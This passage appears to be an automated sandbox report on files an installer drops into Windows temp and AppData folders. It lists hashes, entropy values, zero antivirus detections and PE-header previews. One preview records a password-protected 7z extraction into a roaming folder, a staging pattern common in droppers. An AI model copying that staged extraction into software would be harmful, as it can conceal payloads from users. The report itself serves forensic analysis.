                              SHA-512:4609F791DEF263D03FDB57068B626582437E2598BCF77B68456DD2C2C7FE855FF2E71FF555B313BA0E94FADCDC2DC105DA95DC9E566E11369D5C8AF1A98A3A1B
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............uH..uH..uH...H..uH..qI..uH..vI..uH..tH..uH..tI..uH..pI..uH..uI..uH..|I:.uH...H..uH..wI..uHRich..uH................PE..L......=...........!.....R...V...............p...........................................@A........................pa..l......X.......P........................... >..T............................>.......................V.......................text....Q.......R.................. ..`.data....(...p.......V..............@....idata...............d..............@..@.didat..`............|..............@....rsrc...P............~..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):398336
                              Entropy (8bit):7.1846894828937105
                              Encrypted:false
                              SSDEEP:12288:E15s2/azNQo8oT1EWDEkO6VzZF9uyHLjlHf:o/2CFPkDVzZF9uyHtHf
                              MD5:3FA8077C9C6A769B3BD88800E818BDF6
                              SHA1:7A1E69172E18831FBA28026BE7A24355354713B5
                              SHA-256:1D1FF5C14D8DD0C0F93A2C3DBFC7369E542DEF86C4E4E21659B847C43420C4C3
                              SHA-512:5C4DACFC5D34940F3ABA62A641398ABEA5CA94622EEFD850F902575A43647CB67CFE4091661ACB3710F242FAE2F6FB0E875D679286ABF6C5F38B0CF8572FE1AE
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........F.s..s..s......s...w...s...p..s..r.`.s...r..s...v..s...s..s...z...s.....s...q..s.Rich.s.........................PE..L...S;Y............!................@........0...............................P............@A.........................%............... ..X....................0..`... Z..T....................................................$..@....................text............................... ..`.data........0......................@....idata..............................@..@.didat..............................@....rsrc...X.... ......................@..@.reloc..`....0......................@..B................................................................................................................................................................................................................................................................
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):264992
                              Entropy (8bit):6.422639874613466
                              Encrypted:false
                              SSDEEP:6144:4i7RSMUw32CszCxRBL17SxvZiPk7H0FsoTVC7Rr:b9p25z+J7v8H0Fso2Rr
                              MD5:5F5E63F6EB6BADA4051AE5B3ADE35C95
                              SHA1:9925C1A5DD98CC0D24F2DB35E75C6FA3512B6BB0
                              SHA-256:5B40BE2B83DE58C9C787D9E97D218EC3CECECEE30CA884CD7A3B45D60A9F2FD9
                              SHA-512:7835DD94B14286FB55EEADCDF1C675C3674A3AE1F94D5A4DB141D9C08E2423EF70DC18C48FFD1EADEB2BFB37D89E435268D80C4E41DA771E0123AC87BBB1C3A0
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4/W.Z|W.Z|W.Z|^..|u.Z|C.^}X.Z|W.[|..Z|C.[}P.Z|C._}U.Z|C.Y}S.Z|C.Z}V.Z|C.S}r.Z|C..|V.Z|C.X}V.Z|RichW.Z|................PE..L..................!.........|...............................................@.......@....@A........................p.......`...........H............... /... .......'..T...............................................\.......`....................text...-........................... ..`.data...0J.......&..................@....idata..............................@..@.didat..............................@....rsrc...H...........................@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):27648
                              Entropy (8bit):5.776086876326118
                              Encrypted:false
                              SSDEEP:768:vpWhWBPbF7QQWWKmk2sBED0U3bjlkZHp9Tw:0hcR7QQ5C3MH+ZHp9s
                              MD5:D2BC6AE376BA560FD67B402E2A97F4CA
                              SHA1:5F6C77A427921A22F6FDFAC4460F44BCC9A89F83
                              SHA-256:41BACE37D18E89539DDA9846AC0AF6ED4733282B01EE99AD735C1638391BF4C3
                              SHA-512:7B5251FCB069AA90DD178AFBB7F405B4737C75ACDFBB28215FBEF1F92F3BC47C24428542C4DB81E2F7E10D865A04FE4A8D404A88D7CE5D491B7D6E1B6F1C95D2
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:7-zip archive data, version 0.4
                              Category:dropped
                              Size (bytes):3756821
                              Entropy (8bit):7.999950735502969
                              Encrypted:true
                              SSDEEP:49152:SPX5+ecyESLsnN+9/mWfUrkNI7YXv4o4pZ54jEoET6aH2xIuueh26VmQ9FTdPTfQ:SPpLqm/mwUQNI7Zp8xTw6vRPTbSclMj
                              MD5:ADF5C26373A00E49DFC8B59678A26851
                              SHA1:5E0D3E43187E8652FE6B7E898AD666C2939F3C38
                              SHA-256:D009598D6F687532EB734A222D9C0D7EAA179655F736F7A7DD3A2DCB7FAB4AD7
                              SHA-512:ADA9E3C6A9EB49ADCCDC07D30B1A3994C84DE0C9DF93EC365D2396E0C06472C31A6FE2BBA45930DC2B384DC36FFF7D858F1692DCE6DCF57A8543F7F86CA5D70E
                              Malicious:false
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):169
                              Entropy (8bit):4.897115970448875
                              Encrypted:false
                              SSDEEP:3:I5Pt+kiEaKC5ysLvdFnoNt+kiEaKC5yt0RaStYVSQcYQyXWOt+kiEaKC5yH:INwknaZ5lgwknaZ5QwhC4xrOwknaZ5U
                              MD5:E2E49E39DB4BDC339703AF8EBD811AAD
                              SHA1:43F67BF0B927D0063FA023B4C79D993481E512DB
                              SHA-256:B99D5FCCD4318A81C6B68397670C963E9434A9EFF76C630DBD2A69DDBF31F8A3
                              SHA-512:BD5228AE9853F71454B4EBD6ACE55BEAFD2845A53C9705BEA7E1125588AC75A551A141D9DC205134ECB2CD03A3BE2A25A4D0DBE4B57CB4C18AAD6B48014345AA
                              Malicious:false
                              Preview:"C:\Users\user\AppData\Roaming\PSecWin\7z.exe" x -aoa "C:\Users\user\AppData\Roaming\PSecWin\SoundNight.7z" -p"fa073db961c" -o"C:\Users\user\AppData\Roaming\PSecWin\"
                              Process:C:\Users\user\AppData\Roaming\PSecWin\7z.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):20
                              Entropy (8bit):3.8841837197791884
                              Encrypted:false
                              SSDEEP:3:QSM3r9:Hkr9
                              MD5:D2EC38A2F034052124ABC5DE27A0CF08
                              SHA1:198CECE15DDA469855FABACC38041A04626EDA24
                              SHA-256:DCA33C88066644EE5A99AECE0DEE86830AD7811AADDF677E514F4C08AE578CB5
                              SHA-512:7D9859168435276ECDCAFF43906AF949AE9863A11E30D74965E88C64A06D951723DFC1BAD5641474C24FF13079FA7D0142D18B89F88F6FBA7DAC499F1C6D501F
                              Malicious:false
                              Preview:parsec-windows.exe..
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):17408
                              Entropy (8bit):5.099127756403988
                              Encrypted:false
                              SSDEEP:192:lzZ1jWp6XwpkG1ThzQosFRi2gKp8W+YAUtpu1KAgsPzKbMq/YWqB/WcNwGOUf:De9Nhei2gS8W+YAUts1V2oPWqB/WEOU
                              MD5:BE2A0F4DFE1DF0C0A095C05787421510
                              SHA1:521A6F5F4268C0E560075F81760AFED0E22E9C56
                              SHA-256:B46D21E8758624D184A063B2C021AEFFF45CA0C33AECC8840829F16E8E32B43A
                              SHA-512:60955C89F4E56FDA473CF756C04B75B59AFFCF8600380ABA3E12DC41B6E0B370FF04B6320D05FFECBDD7994455796B1CD7DA96BBBCF4948DFE74C3B75974296D
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):21504
                              Entropy (8bit):5.437181553041295
                              Encrypted:false
                              SSDEEP:384:ATE5/wpuI8sgqzptH/b3wGK0LTOefJoJA1FwPWuxWp:NmjppbNlxfJoJALwZe
                              MD5:3417CBAB13CD103B5AEE4D4EF297C240
                              SHA1:2BBBB44DD6592701B749DC352A98DBA7642712F2
                              SHA-256:5BEB57FFFC92BCB5FBD8AFD8B2E09EDAE93E895BB9A4604C010EB377930813AD
                              SHA-512:5A14F422D5E5F292C914D07A083E736B1F33D7CF98C72388F87488C431379FBC70CACB1DC25A97B3887FC35E1E9B7ACF03A9329B355001F7CCAACB0D5CA0F2E3
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):224256
                              Entropy (8bit):6.25795248247157
                              Encrypted:false
                              SSDEEP:6144:5jjuLdC4oe1TV5BwAeK0bT6GkwbQpwsYGGM5:5ja2ev3wAeKAu3OsT5
                              MD5:86C95709715D9EB0ED4BEBC6AF6153C0
                              SHA1:2ED10D1B00C98DB7E265883E03C0A63D422E23B2
                              SHA-256:4A842E92B17A982D98BEEDF5E25B371E2BE3A0D6939A5A256E2B3066D1B53A16
                              SHA-512:180598CA8318CA2DA688740F5BC3C3CB5D684C8E2EAD036E800E77EBF749EBEC50D5D8A76A58166C8A6918D63EDA17DD105A06CAD3FE2AA52EC5E5A80FAF838D
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):88576
                              Entropy (8bit):6.314245127753692
                              Encrypted:false
                              SSDEEP:1536:mw7cep4vTkKL9El0Zsl/0W7f1/D5cigpoFTtOxGtIWo4fv0vwcQ:mLepXKBPW7f1BgmFTt24fKwcQ
                              MD5:EC617981C8A1ECFD4E982DC222D702C4
                              SHA1:08662D14313DF78CD3A62FEDA10673FA61DE93B4
                              SHA-256:8507C144A2C8A734AF66A8BE601B819943F931EF31A5244381DB359AB7714BB1
                              SHA-512:126B30D460DB356AD83C848B18F885032FB7C55483E51D9096BD172839E07FF1063B796BC2E3DFE8596A192AAA9C80D054441F2CAFEBB05F53421CE94F2D6A62
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):8192
                              Entropy (8bit):3.645665042318358
                              Encrypted:false
                              SSDEEP:96:Orl+urtFDjM60maJGSarulzaYnLakA6wpywK+eXS24eSEWr9wWwMY:Or7bjV3SxzfnLm6wpa5p4qWhwW
                              MD5:29D29296A6532A4964014A3173C91A3A
                              SHA1:0E5CDE29F773F952519EA10DAB24E922962663D7
                              SHA-256:75743713ADAE119D2AFFA85588EECB5415D8975AAF0BE65798CB58FEF1317600
                              SHA-512:DC3D99CBD82B04ED2CBC42256E2C32DC881B45C8DAB16971AC84F35EA8C15CDD7179EB7EBE720B1EC961CC35E341DEF406F280B541498A261736F57399D30F24
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):249856
                              Entropy (8bit):6.618708464341655
                              Encrypted:false
                              SSDEEP:3072:nBFO+6Zhxp7sZcX65P/RkReY41OjF92BMoygqvoJYxL5ZcOJDJN6RH6C78:nB4jZ7pehkYY4y7gqvnxlZcEDn6RLw
                              MD5:CB3AF0211D68FF4EC460D2DD89A25E8D
                              SHA1:38D0214D072E8F80AC9EAFF54B8E2D1E3B1042A7
                              SHA-256:FACB0C90EBD99FA9626D1FBA44DB025F737CA13C9E71AFADD60155E7A6AC8E29
                              SHA-512:D387996162EBA673E8A2031DE6701A242AF87469162A215D3034AE80B6C556203E4A100942208D3BB540212377BA5F2BC83B83D931BB9C37D5AF3A3FD8DB9961
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):13312
                              Entropy (8bit):4.892826616280507
                              Encrypted:false
                              SSDEEP:192:gxfhLX5M7OQL44G7Y5SA3h/frhEcCZVvWsP8g3MWq/:e5NTQL44G7YLxryZlWsP8g3MWs
                              MD5:B248B9CE808EEC990F63FBB3B30862EB
                              SHA1:A1C61C2D8A148D2D80E60FC2A55F4CCCAEF91518
                              SHA-256:A813212F242A4C2673ADB62EDD0953FF9F48BA3303AA7093E96E36320797BAD8
                              SHA-512:2A7C511D1A482F306D65C49ECBFF126084D0079CF396F3F0DE01B3460E1A75D90841964CD43F3DB702BC0532BD2D829DF49115C6AE210862546567AD26F2D428
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):11776
                              Entropy (8bit):4.616246965122149
                              Encrypted:false
                              SSDEEP:192:plvzZj/2YI5to2rwyYXdL93EcNZzWPoozWB1:5j/2YI5C2r5YXdL9rZzWPo0Wv
                              MD5:062B973C9183EC3309A986B5657377CC
                              SHA1:DFF23CEC6F477F292BE99EDB12F2AC8069FD3A7F
                              SHA-256:C17AE52F0447A7B1E7150849260A7B0F05786BB275A03D6E4F4B2663F332D715
                              SHA-512:B16E619A42C9D84076AD4AFB4A01FE3B735769E35F8D73CD84CEEC423FA2FE0BDD5155A4C24047DB7C8C2EE43B2592FBF944EE6714F1A4A47DC116CB38DCF081
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):615424
                              Entropy (8bit):6.486463968251161
                              Encrypted:false
                              SSDEEP:6144:9LBMhWV4vkP/vhYsCrnLtnG3Fypb2dZjD0L9XlZXzfUD+ml5oCEGcmC0W0qj9rnv:9LBMhWV4vkPis8nLlY6k+mTBCtmA
                              MD5:6A2E421022720242F2275E9C2011C185
                              SHA1:03FEFC6077DC0AE418F74C344C44AEB8E9140CE7
                              SHA-256:C83C9F5BE7ADAC1820C54A4B345E91745EA7F46990855E0C1A39A35FF27AE2ED
                              SHA-512:DF8A5D8350F7C366AAA417DC5E0A326C66DB6037527C1664912F2ADFAA8AADE142F0589E358AF9E2D9811756B5F6E10730E543804524B9B9C91234D2E788463C
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):999424
                              Entropy (8bit):6.74144786926542
                              Encrypted:false
                              SSDEEP:24576:uMYkn2ijHDlBUO4wYElIGS8wz5KKjggXiMf43GZL:Ik2iTUGShM3G1
                              MD5:2392FFC039A33076BB34F4498F66F145
                              SHA1:EA248B00D3CF7CCBCCFEBEC808690EAFF00D31E9
                              SHA-256:0E3BDCF8631BBDEE53347A2F1DB37998D7079F646C66E110D890F83E3D63731C
                              SHA-512:B70143A646B357B7AE4E9CB7BDEB83C9AD7DCFCAA1927C7DD891470BF64372B764478BBCBBE214ACD1148E6E6164B0F0B1DAAF31BE25C3E4124C6B003EC0E7E1
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):26112
                              Entropy (8bit):6.067632829123416
                              Encrypted:false
                              SSDEEP:768:Uiora7O3sp942cRR/aay7rSEaxyIfZOZVDdbc385:UioO7e+zUR/ad1KyIfZOZVRbc385
                              MD5:267D4B93BE248D3CE10DF54C4CD2C57C
                              SHA1:1E7E19158EBFF8BC43BE1E19C8E5D66A50874FFC
                              SHA-256:BA3786CF09C00CA427859093D8D86EFE19B1B64F957C066834EFD8966C9DBEB2
                              SHA-512:D0EC2777AC879AA124E86E0E4317CA6B92CFD838581695260D1062730049EA5EFD63309F98E9EE3E52EF59512AF959AF4B72006E3F5BA925057C99FE33391C9A
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):97792
                              Entropy (8bit):6.59754817112535
                              Encrypted:false
                              SSDEEP:1536:B8lLdQjbkHMmGHvH74UkwC6EVZ8sm+WjQ+WMMl1M4WAki91BuGJEfXlIQBj:+1dQvkHXGHvb4UBC3VZ8smS9l1M4WAk1
                              MD5:331BA50FC802AA0467074D019AD77D46
                              SHA1:B333DE90D1BFC891CB6D85EAE8EB8D115FB5FFAC
                              SHA-256:AE88C9C998234A26A6C327F5A8A4F6C576F8AC4BF54A96A50D8C17539E16C0F7
                              SHA-512:46CB251BA4344DF190E675F0F80E3906FAE5455752ABAA176750706BF01EA27D6F2123E2366A160EFE32D5B5E8FA993FB245C1022977DC92E38187AFBDF4840E
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):189440
                              Entropy (8bit):6.221097141099736
                              Encrypted:false
                              SSDEEP:3072:AeJBynLxPazkW2WK0GrQ/EKkSCwL0Yt6OpIDn/DkSnhzSnhwbf:AkynLxCzd2QGXKk9wQYEQID/DnWE
                              MD5:74F5569F0A9F686A31171D0C7339A403
                              SHA1:FB33C76CF931317C41314374120EBAA1C6E34849
                              SHA-256:4394B0AE396B1001671C6748DA7B60B4CF9746A66DC1D83CD68CF0D5853750E7
                              SHA-512:8C9849C394D4917C5EA2B0D26AFFE4CC02E88DDDA9A7789CE627BF5F1872AED270B7603D68670CE828CF9D87621373D9FE6391FC6B293E51D1350E095D30F9D7
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):8704
                              Entropy (8bit):4.810621720665765
                              Encrypted:false
                              SSDEEP:96:9MSvZiG2+XZ9PIzWIY+0y1/wbaDQzf7qfBS9nFJEcMYZcEWIdWwWZ2f:PfJsW7+0AHGfWfBqn7Ec3ZtWIdWH0
                              MD5:8881F8445B35C24DC307561809E15A4A
                              SHA1:1B76C7657AAEAAC45D39B837E2131B5B4113F599
                              SHA-256:0CBEB415A66083408897C5C8D404BFA2B32132CC49C203969125A106AE2C0520
                              SHA-512:3B6C764896F9EA30E1BE38496AAF6F16507034D9AE8D6B87046A9A69197061E56657A1E6FB7A1F57E77E73F93CF962E8F122577AED78FE55D984D37554F176A1
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........K...........;...........................................W..........Rich...........................PE..L....\.............!................`........ .....t.........................`.......t....@A............................H...d0.......@.......................P..4.......T............................................0..`............................text...8........................... ..`.data...P.... ......................@....idata.......0......................@..@.rsrc........@......................@..@.reloc..4....P....... ..............@..B................................................................................................................................................................................................................................................................................................................
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):42084427
                              Entropy (8bit):7.994182193971576
                              Encrypted:true
                              SSDEEP:786432:86C+y9VGxOJsOooGqv7bHeSHEgMUTeo1Ut6KND/pe9ta8FnvGnu9u:8z+yv+MDSSkgM0ep6Yg9s
                              MD5:428BCB03D849B5140EDCA31C8E8B4874
                              SHA1:FD88969C70F0D166E8B5BADF869543046BC2350A
                              SHA-256:5F226C3CDA030DFFBC99B6603D868CA4A6DD87203F07837394DE08155934D417
                              SHA-512:07DB273C91AD6D74860784D5934D9759B170D403A03AC593C269E0F414545921AF52AB493A21C9CA00B77F721F503EC2A88E8A0273457EB2AF9813E4FDFBA6C7
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...oGXb.................R...<.......^.......p....@..........................`............@......@...................@....... .......p.......................................................`......................."..T....0.......................text....9.......:.................. ..`.itext.......P.......>.............. ..`.data....7...p...8...V..............@....bss.....m...............................idata....... ......................@....didata......0......................@....edata.......@......................@..@.tls.........P...........................rdata..]....`......................@..@.rsrc........p......................@..@....................................@..@........................................................
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):24576
                              Entropy (8bit):5.082615237943708
                              Encrypted:false
                              SSDEEP:384:lHBTJylPhhzEfNBgZhaXnGsSu+Fwh8eJVrEGkntlG3aK63iFgzC:lHBTJghhzEfNBgZhaXhpEo
                              MD5:FB475B41189AACF1C607C1E9DC0EBB0B
                              SHA1:822AC3B64FF9C5A95AA13E8C9022C45D629BD3D4
                              SHA-256:B0EBC9AA38B12138FD4D54DDF65F8BA7AF9D71D24B8BD1F37ED198790F4E19CC
                              SHA-512:F8C571B69BB495A49CB1CB70B36542AEA94BC7A18AC5F3EC0F41D9A57663BF786B225BF16252BE181FCAFEAC129541DEC35951B32E9E0091502BE24C05FF0FD4
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........=..S...S...S...S...S......S...Q...S.Rich..S.........PE..L...&..............!.........^............................................................@E........................`....U...........p..h...............................T............................................................................text....V.......X..................@..@.rsrc...h....p.......Z..............@..@....&..........."....f...X......&...........d...(f..(X......&...........$....f...X..................&........ ........................... ...!..;!..f!...!...!...!..."..C"..["..z"..."..."..."...#...#..>#..f#...#...#...#..*$..^$...$...$...$..%%..M%..l%...%...%...%..1&..s&...&...&...'..8'..['..y'...'...'...'..1(..R(..i(...(...(...(...(...)..Y)..})...)...)...)...*..3*..T*..|*...*...*...+..E+...+...+...+..),..S,...,...,...,...,..$-..F-..j-...-...-...-......6...W...|................/..4/..
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):37376
                              Entropy (8bit):5.966343313052938
                              Encrypted:false
                              SSDEEP:384:3snxV0syl9EL+P5bDKsyitrftctswffpTFAHYxSxJsUxR9vF/fA+YgvD7qW+k8xl:e4syYT3xFUxpdKrk8O5LD0vi/FY/x4
                              MD5:F831178A0ACA9969B0AD84D845FDC213
                              SHA1:8153AF847ECCD0CEF31388F903C60AF138C4DB4B
                              SHA-256:3FD12219C578E7AA7FAEFE0848032FC766AC660BBB1A4EE810437A3644012771
                              SHA-512:25E71AFAB049E245B9B05158850E9F6827C47A2E632F467F7B69B203D4381E9B0C74E719012213ABDBE66366BE1DD2610994669067B18BBB47972F2BFEA56CE0
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... .`Yd...d...d...p...f...p...j...d...0...p...u...p...e...p...e...p...c...p...e...p...e...Richd...................PE..L....P.............!.....v..........`z..............................................f.....@A................................t...................................$....3..T...............................................p............................text....t.......v.................. ..`.data...t............z..............@....idata...............|..............@..@.rsrc...............................@..@.reloc..$...........................@..B........................................................................................................................................................................................................................................................................................................................
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):120832
                              Entropy (8bit):6.452660436286688
                              Encrypted:false
                              SSDEEP:3072:VUcCdrEZyY755X5YTC81grxQUfZtPrFD:UiyS5JYN1grxQUfZt
                              MD5:267A42F3D8CDF6FCE02BFDA76A724120
                              SHA1:9A17457DAD529419715AC6F092052FF7D1F01469
                              SHA-256:907947FCA16FAB90430F56259EB81EF0609AAAC8166BC174D129945CE78E4A5E
                              SHA-512:64C4D0E54C1D633EF3F7E31B77EA74975FA14A603E1F9590890A9741D23B6430EFC6DD2E8ADF2C0B0E55F8F2B58DF974708A8613198DCB8AD38566B37E579990
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+...o..Eo..Eo..E{..Dc..E{..Dm..Eo..E...E{..D|..E{..Dn..E{..Dw..E{.LEn..E{..Dn..ERicho..E........PE..L....X.Y...........!...............................e................................A.....@A............................).......................................4....F..T...........................(...................|............................text............................... ..`.data...X...........................@....idata..............................@..@.rsrc...............................@..@.reloc..4...........................@..B........................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):67072
                              Entropy (8bit):6.314142155382167
                              Encrypted:false
                              SSDEEP:1536:St/KlpLMTc3WRyIdA2rS7D4NrOI4wlzgB5VdtXgDF3:NLMo3WRyIiwI4kggB5VdtXgDF
                              MD5:0195F2ACF32E1ECDC5AF0E3CF5184373
                              SHA1:993CD3216F983B6D1711CCE77976C71E1B7D6F9E
                              SHA-256:51B3F3BA1A7ABD58BED2C9E9EF67C39592FE585699EFBFE157308AF86F6930CC
                              SHA-512:E922C14E20072993B67DDE391F821E2E58C52D58AE7B194BB999B97C33637FF44597D005ED8E54495D87A4977E3954F00AD07971840115FF9E9343562BB98812
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........S..S..S..G...R..G...\..S.....G...@..G...Q..G...R..G...D..G.e.R..G...R..RichS..................PE..L.................!.........0.....................w.........................@............@A........................p...9...H........ ..P....................0..(....!..T........................... ...................D.......`....................text............................... ..`.data...............................@....idata..T...........................@..@.didat..(...........................@....rsrc...P.... ......................@..@.reloc..(....0......................@..B................................................................................................................................................................................................................................................................................
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (native) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):7168
                              Entropy (8bit):3.3828878559559703
                              Encrypted:false
                              SSDEEP:96:vKiQPIPmWlhsyNcKXWT6w5qNeWhOWwCP:Ci5PmR+eWhOW
                              MD5:E27BB683A96D3C2338FB46385AB7F2FB
                              SHA1:FE4B1A347EE4B9C55D4A53C24C3FFD51F2547CFD
                              SHA-256:9B47A5D829F7045AF99FFD1F6380870BCE47505B41B9CBA88E94C7FC15B8C7E6
                              SHA-512:7EB8E4AF5F53D1C05F04285CAD928D2FB838E2EA7C6BCE261B668EED6C2E5A9E59ACF5213478A007C9C1D79FC291CE1858151B7E92DD6CF0E0EB4E3EF1043F4A
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........2...\...\...\...\...\...X...\.....\...^...\.Rich..\.........................PE..L...}1u............!......................... .....R.........................@............@E............................P............ .......................0..........T............................................................................data...G........................... ..`.rsrc........ ......................@..B.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):37376
                              Entropy (8bit):5.916839934179735
                              Encrypted:false
                              SSDEEP:768:VP+MF9uXFkzxt8xJ0ltub+aTOV6GndP4Nm5f:VNumn8xJga294Ny
                              MD5:83D97778953F5A1A93EA93E644273DC7
